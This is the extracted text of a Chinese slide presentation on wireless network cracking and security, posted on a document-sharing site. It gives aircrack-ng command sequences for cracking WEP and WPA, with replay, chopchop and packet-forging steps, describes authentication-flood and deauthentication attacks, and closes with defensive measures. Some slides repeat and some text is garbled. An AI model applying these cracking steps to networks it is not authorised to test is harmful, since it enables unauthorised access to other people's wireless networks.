无线的破解与安全

上传人:xiao****1972 文档编号:72780784 上传时间:2019-01-24 格式:PPT 页数:15 大小:1.18MB
返回 下载 相关 举报
无线的破解与安全_第1页
第1页 / 共15页
无线的破解与安全_第2页
第2页 / 共15页
无线的破解与安全_第3页
第3页 / 共15页
无线的破解与安全_第4页
第4页 / 共15页
无线的破解与安全_第5页
第5页 / 共15页
点击查看更多>>
资源描述

《无线的破解与安全》由会员分享,可在线阅读,更多相关《无线的破解与安全(15页珍藏版)》请在金锄头文库上搜索。

1、无线的破解与安全,姜 辉,提纲,相关背景 WEP的破解(1) WPA的破解 无线安全,相关背景,无线网卡的选择 芯片。Athetos ,Prism,Ralink (USB) 无线网卡的硬件/固件版本 无线网卡的功率及规格 基本知识 SSID(Service Set Identifier,服务集标识符) 一个唯一的标识符,最大长度32 WAP(wireless Application Protocol,无线应用协议) AP(wireless Access Point) 无线接入点,相关背景,几个比较好的无线破解系统(Linux) BackTrack WiFiSlax WiFiWay Linux系

2、统下无线探测工具 Kismet(Bt4自带) Wicrawl(扩展功能较好) AirSnort(具有自动抓包并破解WEP的能力) Bt4下使用iwlist或者,相关背景,几个比较出名linux系统 BackTrack WiFiSlax WiFiWay Linux系统下无线探测工具 Kismet(Bt4自带) Wicrawl(扩展功能较好) AirSnort(具有自动抓包并破解WEP的能力) Bt4下使用iwlist或者Internet-Wicd Network Manager,相关背景,几个比较出名linux系统 BackTrack WiFiSlax WiFiWay Linux系统下无线探测工

3、具 Kismet(Bt4自带) Wicrawl(扩展功能较好) AirSnort(具有自动抓包并破解WEP的能力) Bt4下使用iwlist或者Internet-Wicd Network Manager,WEP破解技术(1),Ifconfig a wlan0 up 载入无线网卡的驱动程序 首先要在vmware中连接 探测无线AP的信息 airmon-ng start wlan0 监控频道 成功后会开启一个监控网卡,如 mon0 airodumpng w dump channel 6 mon0 aireplay-ng -3 b aps MAC h clients MAC x 1024 mon0

4、aircrack-ng x f 2 dump-01.cap,WEP破解技术(2),Ifconfig a wlan0 up 载入无线网卡的驱动程序 首先要在vmware中连接 探测无线AP的信息 airmon-ng start wlan0 监控频道 成功后会开启一个监控网卡,如 mon0 airodump ng ivs c 监控频道w dump channel 6 mon0 aireplay-ng -1 0 e aps essid aps MAC h clients MAC (网卡) x mon0,WEP破解技术(2),aireplay-ng -4 b APs MAC h clients MAC

5、 mon0 Chopchop 攻击 生产可用的密钥数据流文件 会生产一个cap和一个xor的文件 packetforge-ng o a APMAC h clients MAC -k 255.255.255.255 -1 255.255.255.255 y fragment xor file w dump1 airepaly-ng -2 r dump1 mon0 aircrack-ng dump*.ivs,WAP破解技术,airmon-ng start wlan0 没有正常的加载驱动 airodump-ng -w dump channel 频道 mon0 Dump为数据包 aireplay-ng

6、 -o 攻击次数 APs MAC h clients MAC mon0 WPA握手的验证 zcat /pentest/password/dictionaries/ wordlist.txt.Z password.txt 生产字典(bt4 自带) aircrack-ng w password.txt -z dump01.cap 破解,WEP破解流程,无线的安全,身份验证洪泛攻击,攻击原理 关联的客户端向AP发送大量伪造身份验证请求 当请求超出AP的承载能力时断开与客户的连接 攻击实现 使用看似合法的但是随机生成MAC伪造工作站 向AP发送大量的虚假请求,身份验证失败攻击,攻击原理 关联的客户端向AP伪造客户端无效验证帧 AP将受害客户端更新为状态1 攻击实现 关联客户端伪造某合法客户端向AP发送无效的验证帧 AP认为该验证请求无效 将受害者的状态更新为1,总结,尽量使用相对安全的防御措施 隐藏无线局域网的SSID号码 使用WPA加密 实施MAC地址过滤 进行802.1x认证 控制无线信号的范围,

展开阅读全文
相关资源
相关搜索

当前位置:首页 > 高等教育 > 大学课件

电脑版 |金锄头文库版权所有
经营许可证:蜀ICP备13022795号 | 川公网安备 51140202000112号